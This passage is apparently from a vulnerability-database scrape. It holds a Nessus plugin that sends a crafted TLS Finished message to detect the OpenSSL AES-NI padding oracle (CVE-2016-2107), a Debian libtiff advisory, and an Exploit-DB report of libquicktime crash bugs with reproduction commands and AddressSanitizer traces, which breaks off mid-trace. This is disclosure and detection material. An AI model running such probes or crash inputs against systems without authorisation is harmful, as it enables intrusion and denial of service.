script_set_attribute(attribute:\"plugin_modification_date\", value:\"2019/04/11\");\n\n script_cve_id(\"CVE-2016-2107\");\n script_bugtraq_id(89760);\n script_xref(name:\"EDB-ID\", value:\"39768\");\n\n script_name(english:\"OpenSSL AES-NI Padding Oracle MitM Information Disclosure\");\n script_summary(english:\"Checks if the server sends a RECORD_OVERFLOW alert to a crafted TLS handshake.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"It was possible to obtain sensitive information from the remote host\nwith TLS-enabled services.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is affected by a man-in-the-middle (MitM) information\ndisclosure vulnerability due to an error in the implementation of\nciphersuites that use AES in CBC mode with HMAC-SHA1 or HMAC-SHA256.\nThe implementation is specially written to use the AES acceleration\navailable in x86/amd64 processors (AES-NI). The error messages\nreturned by the server allow allow a man-in-the-middle attacker to\nconduct a padding oracle attack, resulting in the ability to decrypt\nnetwork traffic.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blog.filippo.io/luckyminus20/\");\n # https://web-in-security.blogspot.com/2016/05/curious-padding-oracle-in-openssl-cve.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7647e9f0\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20160503.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to OpenSSL version 1.0.1t / 1.0.2h or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:openssl:openssl\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"General\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssl_supported_versions.nasl\");\n script_require_ports(\"SSL/Supported\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"x509_func.inc\");\ninclude(\"rsync.inc\");\ninclude(\"acap_func.inc\");\ninclude(\"ftp_func.inc\");\ninclude(\"imap_func.inc\");\ninclude(\"ldap_func.inc\");\ninclude(\"nntp_func.inc\");\ninclude(\"pop3_func.inc\");\ninclude(\"smtp_func.inc\");\ninclude(\"telnet2_func.inc\");\ninclude(\"xmpp_func.inc\");\ninclude(\"ssl_funcs.inc\");\ninclude(\"string.inc\");\n\n##\n# Checks whether a cipher is in a list of cipher suites.\n#\n# @anonparam cipher Cipher in question.\n# @anonparam ciphers List of cipher suites.\n#\n# @return TRUE for success, FALSE otherwise.\n##\nfunction tls_cipher_in_list()\n{\n local_var cipher, ciphers, i, id, len;\n\n cipher = _FCT_ANON_ARGS[0];\n ciphers = _FCT_ANON_ARGS[1];\n\n len = strlen(ciphers);\n for (i = 0; i < len; i += 2)\n {\n id = substr(ciphers, i, i + 2 - 1);\n if (cipher == id) return TRUE;\n }\n\n return FALSE;\n}\n\n##\n# Split the key block into IVs, cipher keys, and MAC keys.\n#\n# @anonparam keyblk Key block derived from the master secret.\n#\n# @return TRUE for success, FALSE 
otherwise.\n##\nfunction tls_set_keys(cipher_desc, keyblk)\n{\n local_var mac_size, iv_size, key_size, pos, tls;\n\n # Determine the size of the key block's fields.\n if ('Mac=SHA1' >< cipher_desc) mac_size = 20;\n else if ('Mac=SHA256' >< cipher_desc) mac_size = 32;\n else return FALSE;\n\n if ('Enc=AES-CBC(128)' >< cipher_desc) { key_size = 16; iv_size = 16; }\n else if ('Enc=AES-CBC(256)' >< cipher_desc) { key_size = 32; iv_size = 16; }\n else return FALSE;\n\n # Ensure the block is big enough.\n if (strlen(keyblk) < 2 * (mac_size + key_size + iv_size))\n return FALSE;\n\n # Extract the data from the key block.\n pos = 0;\n tls['enc_mac_key'] = substr(keyblk, pos, pos + mac_size - 1); pos += mac_size;\n tls['dec_mac_key'] = substr(keyblk, pos, pos + mac_size - 1); pos += mac_size;\n tls['enc_key'] = substr(keyblk, pos, pos + key_size - 1); pos += key_size;\n tls['dec_key'] = substr(keyblk, pos, pos + key_size - 1); pos += key_size;\n tls['enc_iv'] = substr(keyblk, pos, pos + iv_size - 1); pos += iv_size;\n tls['dec_iv'] = substr(keyblk, pos, pos + iv_size - 1);\n\n return tls;\n}\n\n##\n##\n# Tries to make a TLS connection to the server.\n#\n# @return TRUE for success, FALSE otherwise.\n##\nfunction attack(port, ciphers)\n{\n local_var soc, data, rec, srv_random, clt_random, version, cipher_desc;\n local_var cert, clt_cert_requested, skex, premaster, n, e, dh_privkey;\n local_var ckex, keyblk, tls_keys, tls_ciphertext, pubkey;\n\n # Get a socket to perform a handshake.\n soc = open_sock_ssl(port);\n if (!soc)\n # XXX-ALW Fix this error message\n return [FALSE, \"open_sock_ssl\", \"Couldn't begin SSL handshake\"];\n\n data = client_hello(\n v2hello:FALSE,\n version:mkword(TLS_10), # Record-layer version (RFC5246 Appendix E)\n maxver:mkword(TLS_12), # Handshake version; maximum we support\n cipherspec:ciphers,\n extensions:tls_ext_ec(keys(curve_nid.tls))\n );\n send(socket:soc, data:data);\n rec = ssl_parse(blob:data);\n # Hang onto the Client Random; we need it 
to derive keys later.\n clt_random = mkdword(rec['time']) + rec['random'];\n\n # Read records one at a time. Expect to see at a minimum:\n # ServerHello, Certificate, and ServerHelloDone.\n while (TRUE)\n {\n # Receive a record from the server.\n data = recv_ssl(socket:soc);\n if (isnull(data))\n {\n close(soc);\n return [FALSE, \"recv_ssl\", \"Did not receive expected ServerHello, ServerCertificate, etc.\"];\n }\n\n # ServerHello: Extract the random data for computation of keys.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_HELLO\n );\n\n if (!isnull(rec))\n {\n # If server asks for version less than TLS 1.0 or higher than TLS 1.2, fail.\n if (rec['handshake_version'] < TLS_10 || rec['handshake_version'] > TLS_12)\n return [FALSE, \"handshake_version\", \"Server does not support TLS 1.0, 1.1, or 1.2\"];\n\n # Use the TLS version the server wants\n version = rec['handshake_version'];\n\n srv_random = mkdword(rec['time']) + rec['random'];\n\n # Wacko SSL servers might return a cipher suite not in the\n # client's request list.\n if (!tls_cipher_in_list(mkword(rec['cipher_spec']), ciphers))\n {\n close(soc);\n return [FALSE, \"cipher_spec\", \"Server ignored our list of supported ciphers\"];\n }\n\n # Store the negotiated cipher suite.\n cipher_desc = ciphers_desc[cipher_name(id:rec['cipher_spec'])];\n\n if (isnull(cipher_desc))\n {\n close(soc);\n return [FALSE, \"cipher_spec\", \"Assertion failure\"];\n }\n }\n\n # Certificate: Extract the server's public key.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_CERTIFICATE\n );\n\n if (!isnull(rec) && max_index(rec['certificates']) > 0)\n {\n # First cert in the chain should be the server cert.\n cert = parse_der_cert(cert:rec['certificates'][0]);\n if (isnull(cert))\n {\n close(soc);\n return [FALSE, \"parse_der_cert\", \"Failed to parse server's certificate\"];\n }\n 
cert = cert['tbsCertificate'];\n }\n\n # Server Key Exchange.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_KEY_EXCHANGE\n );\n\n if (!isnull(rec['data']))\n skex = ssl_parse_srv_kex(blob:rec['data'], cipher:cipher_desc, version:version);\n\n # Certificate Request.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_CERTIFICATE_REQUEST\n );\n\n if (!isnull(rec['data']))\n clt_cert_requested = TRUE;\n\n # Server Hello Done.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_HELLO_DONE\n );\n\n # When we get a ServerHelloDone, it's our turn to send again.\n if (!isnull(rec))\n break;\n\n # Is it an alert?\n rec = ssl_find(\n blob:data,\n encrypted:FALSE,\n 'content_type', SSL3_CONTENT_TYPE_ALERT\n );\n\n if (!isnull(rec))\n {\n close(soc);\n return [FALSE, \"handshake_failure\", \"Server sent alert to ClientHello. Level: \" + rec['level'] + \", description: \" + rec['description']];\n }\n }\n\n # Will contain an empty ClientCertificate (if requested), ClientKeyExchange,\n data = '';\n\n # Create an empty client certificate if one is requested.\n if (clt_cert_requested)\n {\n # Send an empty certificate for now. 
TLSv1.0 says the client can\n # send an empty certificate.\n data += ssl_mk_record(\n type:SSL3_CONTENT_TYPE_HANDSHAKE,\n version:version,\n data:ssl_mk_handshake_msg(\n type : SSL3_HANDSHAKE_TYPE_CERTIFICATE,\n data : ssl_vldata_put(data:NULL,len:3)\n )\n );\n }\n\n # Process ServerCertificate and ServerKeyExchange messages.\n if (cipher_desc =~ \"Kx=RSA[(|]\")\n {\n if (isnull(cert))\n {\n close(soc);\n return [FALSE, \"rsa_kx\", \"Server selected RSA key exchange but didn't provide a certificate\"];\n }\n\n if (isnull(cert['subjectPublicKeyInfo']) || isnull(cert['subjectPublicKeyInfo'][1]))\n {\n close(soc);\n return [FALSE, \"rsa_kx\", \"A server certificate with an unsupported algorithm was found.\"];\n }\n\n n = cert['subjectPublicKeyInfo'][1][0];\n e = cert['subjectPublicKeyInfo'][1][1];\n\n if (isnull(n) || isnull(e))\n {\n close(soc);\n return [FALSE, \"rsa_kx\", \"Failed to extract public key from server certificate.\"];\n }\n\n premaster = mkword(TLS_12) + rand_str(length:46);\n\n # Encrypt the premaster secret with server's RSA public key.\n ckex = rsa_public_encrypt(data:premaster, n:n, e:e);\n\n # It looks like TLS 1.0 and up prepend a two-byte length, but the\n # RFC is vague.\n if (version >= TLS_10)\n ckex = ssl_vldata_put(data:ckex, len:2);\n }\n else if (cipher_desc =~ \"Kx=DH[(|]\")\n {\n if (isnull(skex))\n {\n close(soc);\n return [FALSE, \"dh_kx\", \"Server selected DH key exchange but didn't provide a ServerKeyExchange\"];\n }\n\n # Generate the client private key,\n dh_privkey = rand_str(length:16);\n\n # Compute the premaster secret.\n premaster = bn_mod_exp(skex['dh_y'], dh_privkey, skex['dh_p']);\n\n # Encode the client's DH public key\n ckex = ssl_vldata_put(\n data:bn_mod_exp(skex['dh_g'], dh_privkey, skex['dh_p']),\n len:2\n );\n }\n else if (cipher_desc =~ \"Kx=ECDH[(|]\" && ecc_functions_available())\n {\n if (isnull(skex))\n {\n close(soc);\n return [FALSE, \"ecdh_kx\", \"Server selected ECDHE key exchange but didn't provide a 
ServerKeyExchange\"];\n }\n\n # Generate the client private key\n dh_privkey = rand_str(length:16);\n\n # Compute the premaster secret\n premaster = ecc_scalar_multiply(\n curve_nid:curve_nid.tls[skex['named_curve']],\n scalar:dh_privkey,\n x:substr(skex['pubkey'], 1, (strlen(skex['pubkey'])) / 2),\n y:substr(skex['pubkey'], (strlen(skex['pubkey']) / 2) + 1)\n );\n # Just the X coordinate of the curve point is used\n premaster = ecc_fe2osp(element:premaster.x, curve_nid:curve_nid.tls[skex['named_curve']]);\n\n pubkey = ecc_scalar_multiply(\n curve_nid:curve_nid.tls[skex['named_curve']],\n scalar:dh_privkey\n );\n\n pubkey.x = ecc_fe2osp(element:pubkey.x, curve_nid:curve_nid.tls[skex['named_curve']]);\n pubkey.y = ecc_fe2osp(element:pubkey.y, curve_nid:curve_nid.tls[skex['named_curve']]);\n\n ckex = ssl_vldata_put(\n # Uncompressed curve point encoding\n data:'\\x04' + pubkey.x + pubkey.y,\n len:1\n );\n }\n else\n {\n close(soc);\n return [FALSE, \"kx\", \"Unsupported key exchange method\"];\n }\n\n # Create a ClientKeyExchange record\n data += ssl_mk_record(\n type:SSL3_CONTENT_TYPE_HANDSHAKE,\n version:version,\n data:ssl_mk_handshake_msg(\n type:SSL3_HANDSHAKE_TYPE_CLIENT_KEY_EXCHANGE,\n data:ckex\n )\n );\n\n tls_keys = tls_set_keys(\n cipher_desc:cipher_desc,\n keyblk:ssl_derive_keyblk(\n c_random:clt_random,\n s_random:srv_random,\n version:version,\n master:ssl_calc_master(\n c_random:clt_random,\n s_random:srv_random,\n version:version,\n premaster:premaster\n )\n )\n );\n\n if (tls_keys == FALSE)\n {\n close(soc);\n return [FALSE, \"kx\", \"Failed to make TLS keys from key exchange\"];\n }\n\n data += tls_mk_record(\n type:SSL3_CONTENT_TYPE_CHANGECIPHERSPEC,\n data:mkbyte(1),\n version:version\n );\n\n # Use a random IV, as it's included explicitly in TLS 1.1\n if (version >= TLS_11)\n tls_keys['enc_iv'] = rand_str(length:strlen(tls_keys['enc_iv']));\n\n # Finished message.\n # We make a record of just bad padding to trigger a RECORD_OVERFLOW alert.\n # 48 
bytes of padding because:\n # o Must be a multiple of AES block size (16 bytes).\n # o Must be at least one byte bigger than the MAC size.\n # o SHA1 is 20 bytes, SHA256 is 32 bytes, so we round up to 48.\n # o SHA384 ciphersuites are not vulnerable.\n tls_ciphertext = aes_cbc_encrypt(\n data:crap(data:'\\xff', length:48),\n iv:tls_keys['enc_iv'],\n key:tls_keys['enc_key']\n );\n # aes_cbc_encrypt() returns an array, [0] is ciphertext, [1] is CBC\n # residue (for TLS 1.0 IV). We don't retain the residue because we\n # don't intent to send any more records.\n tls_ciphertext = tls_ciphertext[0];\n\n # TLS 1.1 explicitly includes the IV in each record\n if (version >= TLS_11)\n tls_ciphertext = tls_keys['enc_iv'] + tls_ciphertext;\n\n data += tls_mk_record(\n type:SSL3_CONTENT_TYPE_HANDSHAKE,\n data:tls_ciphertext,\n version:version\n );\n\n # Send the ChangeCipherSpec and tampered Finished message\n send(socket:soc, data:data);\n\n while (TRUE)\n {\n # Receive a record from the server.\n data = recv_ssl(socket:soc);\n if (isnull(data))\n {\n close(soc);\n return [FALSE, \"post_attack\", \"Server did not send an alert when sent a crafted Finished message\"];\n }\n\n # Is it an alert?\n rec = ssl_find(\n blob:data,\n encrypted:FALSE,\n 'content_type', SSL3_CONTENT_TYPE_ALERT\n );\n\n if (!isnull(rec))\n {\n close(soc);\n if (rec['level'] == 2 && rec['description'] == SSL3_ALERT_TYPE_RECORD_OVERFLOW)\n return [TRUE, \"post_attack\", \"Server sent RECORD_OVERFLOW alert\"];\n else\n return [FALSE, \"post_attack\", \"Server sent alert to tampered Finished. 
Level: \" + rec['level'] + \", description: \" + rec['description']];\n }\n }\n}\n\nget_kb_item_or_exit('SSL/Supported');\n\n# Get a port that uses SSL.\nport = get_ssl_ports(fork:TRUE);\n\nif (isnull(port))\n exit(1, 'The host does not appear to have any SSL-based services.');\n\n# Find out if the port is open.\nif (!get_port_state(port))\n audit(AUDIT_PORT_CLOSED, port, \"TCP\");\n\n# Ciphersuites should basically be the \"Cartesian product\" of:\n# * DHE and RSA key exchanges\n# * AES-CBC with 128- and 256-bit keys\n# * SHA1 and SHA256 HMACs (SHA384 ciphersuites are not vulnerable)\n# TODO: should support ECDHE and ECDSA, once we can do that from NASL.\n\n# We test SHA1 separately from SHA256 and check if *either* was\n# vulnerable, because vulnerable 1.0.1 servers support SHA256 but are\n# only vulnerable on SHA1 ciphersuites. If we offered SHA1 and SHA256\n# at the same time and the server preferred SHA256, it'd be a false\n# negative.\n\ncipher_list_sha1 =\n ciphers['TLS1_CK_RSA_WITH_AES_128_CBC_SHA'] + # <- Required by all TLS 1.2 impls.\n ciphers['TLS1_CK_RSA_WITH_AES_256_CBC_SHA'] +\n ciphers['TLS1_CK_DHE_RSA_WITH_AES_128_CBC_SHA'] +\n ciphers['TLS1_CK_DHE_RSA_WITH_AES_256_CBC_SHA'];\n\ncipher_list_sha256 =\n ciphers['TLS1_RSA_WITH_AES_128_CBC_SHA256'] +\n ciphers['TLS1_RSA_WITH_AES_256_CBC_SHA256'] +\n ciphers['TLS1_DHE_RSA_WITH_AES_128_CBC_SHA256'] +\n ciphers['TLS1_DHE_RSA_WITH_AES_256_CBC_SHA256'];\n\nif (ecc_functions_available())\n{\n cipher_list_sha1 +=\n ciphers[\"TLS1_CK_ECDHE_RSA_WITH_AES_128_CBC_SHA\"] +\n ciphers[\"TLS1_CK_ECDHE_RSA_WITH_AES_256_CBC_SHA\"];\n\n cipher_list_sha256 +=\n ciphers[\"TLS1_ECDHE_RSA_WITH_AES_128_CBC_SHA256\"] +\n ciphers[\"TLS1_ECDHE_RSA_WITH_AES_256_CBC_SHA256\"];\n}\n\nsha1_result = attack(port:port, ciphers:cipher_list_sha1);\n\n# Only do SHA256 test if we didn't find a vuln with SHA1.\nif (sha1_result[0] == FALSE)\n sha256_result = attack(port:port, ciphers:cipher_list_sha256);\n\nif (sha1_result[0] == TRUE || 
sha256_result[0] == TRUE)\n{\n security_report_v4(\n port:port,\n severity:SECURITY_NOTE,\n extra:\n 'Nessus was able to trigger a RECORD_OVERFLOW alert in the\\n' +\n 'remote service by sending a crafted SSL \"Finished\" message.'\n );\n}\nelse\n{\n exit(0,\n \"[Port \" + port + \"] \" +\n \"SHA1 test: \" + sha1_result[1] + \": \" + sha1_result[2] + \". \" +\n \"SHA256 test: \" + sha256_result[1] + \": \" + sha256_result[2]);\n}\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2019-05-30T02:22:05", "bulletinFamily": "unix", "description": "Package : tiff\nVersion : 4.0.2-6+deb7u16\nCVE ID : CVE-2017-11335 CVE-2017-12944 CVE-2017-13726 CVE-2017-13727\nDebian Bug : 868513 872607 873880 873879\n\n\nSeveral vulnerabilities have been discovered in the Tag Image File\nFormat (TIFF) library and its associated tools.\n\nCVE-2017-11335\n\n A heap based buffer overflow via a PlanarConfig=Contig image, which\n causes an out-of-bounds write (related to the ZIPDecode function). 
A\n crafted input may lead to a remote denial of service attack or an\n arbitrary code execution attack.\n\nCVE-2017-12944\n\n A mishandling of memory allocation for short files allows attackers\n to cause a denial of service (allocation failure and application\n crash) during a tiff2pdf invocation.\n\nCVE-2017-13726\n\n A reachable assertion abort allows a crafted input to lead to a\n remote denial of service attack.\n\nCVE-2017-13727\n\n A reachable assertion abort allows a crafted input to lead to a\n remote denial of service attack.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n4.0.2-6+deb7u16.\n\nWe recommend that you upgrade your tiff packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "modified": "2017-09-10T02:12:42", "published": "2017-09-10T02:12:42", "id": "DEBIAN:DLA-1093-1:BF801", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201709/msg00010.html", "title": "[SECURITY] [DLA 1093-1] tiff security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2017-06-10T00:14:07", "bulletinFamily": "exploit", "description": "libquicktime 1.2.4 - Denial of Service. CVE-2017-9122,CVE-2017-9123,CVE-2017-9124,CVE-2017-9125,CVE-2017-9126,CVE-2017-9127,CVE-2017-9128. 
Dos exploit for Li...", "modified": "2017-06-09T00:00:00", "published": "2017-06-09T00:00:00", "id": "EDB-ID:42148", "href": "https://www.exploit-db.com/exploits/42148/", "type": "exploitdb", "title": "libquicktime 1.2.4 - Denial of Service", "sourceData": "libquicktime multiple vulnerabilities\r\n\r\n\r\n================\r\nAuthor : qflb.wu\r\n===============\r\n\r\n\r\nIntroduction:\r\n=============\r\nThe libquicktime package contains the libquicktime library, various plugins and codecs, along with graphical and command line utilities used for encoding and decoding QuickTime files. This is useful for reading and writing files in the QuickTime format. The goal of the project is to enhance, while providing compatibility with the Quicktime 4 Linux library.\r\n\r\n\r\nAffected version:\r\n=====\r\n1.2.4\r\n\r\n\r\nVulnerability Description:\r\n==========================\r\n##################################\r\n1.\r\nthe quicktime_read_moov function in moov.c in libquicktime 1.2.4 can cause a denial of service(infinite loop and CPU consumption) via a crafted mp4 file.\r\n\r\n\r\n./lqtplay libquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4\r\n\r\n\r\nPOC:\r\nlibquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4\r\nCVE:\r\nCVE-2017-9122\r\n\r\n\r\n###################################\r\n2.\r\nthe lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(invalid memory read and application crash) via a crafted mp4 file.\r\n\r\n\r\n./lqtplay libquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4\r\n\r\n\r\nASAN:SIGSEGV\r\n=================================================================\r\n==14254==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x7f31e6ae7185 sp 0x7ffed033a270 bp 0x0000006bdb50 T0)\r\n==14254==WARNING: Trying to symbolize code, but external symbolizer is not initialized!\r\n #0 0x7f31e6ae7184 (/usr/local/lib/libquicktime.so.0+0x6c184)\r\n #1 0x49b1c6 
(/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x49b1c6)\r\n #2 0x47fbaa (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fbaa)\r\n #3 0x7f31e43b2ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #4 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n\r\n\r\nAddressSanitizer can not provide additional info.\r\nSUMMARY: AddressSanitizer: SEGV ??:0 ??\r\n==14254==ABORTING\r\n\r\n\r\ndebug info:\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n...\r\nStopped reason: SIGSEGV\r\n0x00007ffff7829185 in lqt_frame_duration (file=<optimized out>, track=<optimized out>, \r\n constant=<optimized out>) at lqt_quicktime.c:1242\r\n1242 return\r\n\r\n\r\nPOC:\r\nlibquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4\r\nCVE:\r\nCVE-2017-9123\r\n\r\n\r\n###################################\r\n3.\r\nthe quicktime_match_32 in util.c in libquicktime 1.2.4 can cause a denial of service(NULL pointer dereference and application crash) via a crafted mp4 file.\r\n\r\n\r\n./lqtplay libquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4\r\n\r\n\r\nASAN:SIGSEGV\r\n=================================================================\r\n==14359==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fe8af6b85d8 sp 0x7fff490cd4e0 bp 0x7fff490cd5b0 T0)\r\n==14359==WARNING: Trying to symbolize code, but external symbolizer is not initialized!\r\n #0 0x7fe8af6b85d7 (/usr/local/lib/libquicktime.so.0+0x3605d7)\r\n #1 0x7fe8af68b566 (/usr/local/lib/libquicktime.so.0+0x333566)\r\n #2 0x7fe8af63c71a (/usr/local/lib/libquicktime.so.0+0x2e471a)\r\n #3 0x7fe8af3d1658 (/usr/local/lib/libquicktime.so.0+0x79658)\r\n #4 0x7fe8af3d84a8 (/usr/local/lib/libquicktime.so.0+0x804a8)\r\n #5 0x7fe8af3a95da (/usr/local/lib/libquicktime.so.0+0x515da)\r\n #6 0x47fad2 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fad2)\r\n #7 0x7fe8acc8fec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #8 0x47f3dc 
(/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n\r\n\r\nAddressSanitizer can not provide additional info.\r\nSUMMARY: AddressSanitizer: SEGV ??:0 ??\r\n==14359==ABORTING\r\n\r\n\r\ndebug info:\r\nProgram received signal SIGSEGV, Segmentation fault.\r\nStopped reason: SIGSEGV\r\n0x00007ffff7b1d5d8 in quicktime_match_32 (_input=<optimized out>, \r\n _output=<optimized out>) at util.c:874\r\n874if(input[0] == output[0] &&\r\n\r\n\r\nPOC:\r\nlibquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4\r\nCVE:\r\nCVE-2017-9124\r\n\r\n\r\n###################################\r\n4.\r\nthe lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow) via a crafted mp4 file.\r\n\r\n\r\n./lqtplay libquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4\r\n\r\n\r\n=================================================================\r\n==40038==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cd4 at pc 0x7f28959fc45f bp 0x7ffefd561530 sp 0x7ffefd561528\r\nREAD of size 4 at 0x602000009cd4 thread T0\r\n #0 0x7f28959fc45e in lqt_frame_duration /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242\r\n #1 0x49b1c6 in quicktime_print_info /home/a/Downloads/libquicktime-1.2.4/utils/common.c:138\r\n #2 0x47fbaa in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:996\r\n #3 0x47fbaa in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #4 0x7f28932c7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #5 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n\r\n\r\n0x602000009cd4 is located 3 bytes to the right of 1-byte region [0x602000009cd0,0x602000009cd1)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f2895cad7d0 in quicktime_read_stts /home/a/Downloads/libquicktime-1.2.4/src/stts.c:115\r\n\r\n\r\nSUMMARY: 
AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242 lqt_frame_duration\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9340: fa fa 05 fa fa fa 05 fa fa fa 04 fa fa fa 05 fa\r\n 0x0c047fff9350: fa fa 00 fa fa fa 05 fa fa fa 05 fa fa fa 05 fa\r\n 0x0c047fff9360: fa fa 05 fa fa fa 00 fa fa fa 05 fa fa fa 05 fa\r\n 0x0c047fff9370: fa fa 05 fa fa fa 00 fa fa fa 00 00 fa fa 00 01\r\n 0x0c047fff9380: fa fa 04 fa fa fa 05 fa fa fa 00 fa fa fa 05 fa\r\n=>0x0c047fff9390: fa fa 05 fa fa fa 00 fa fa fa[01]fa fa fa 00 04\r\n 0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==40038==ABORTING\r\n\r\n\r\nPOC:\r\nlibquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9125\r\n\r\n\r\n###################################\r\n5.\r\nthe quicktime_read_dref_table function in dref.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.\r\n\r\n\r\n./lqtplay libquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4\r\n\r\n\r\n=================================================================\r\n==41637==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009ce4 
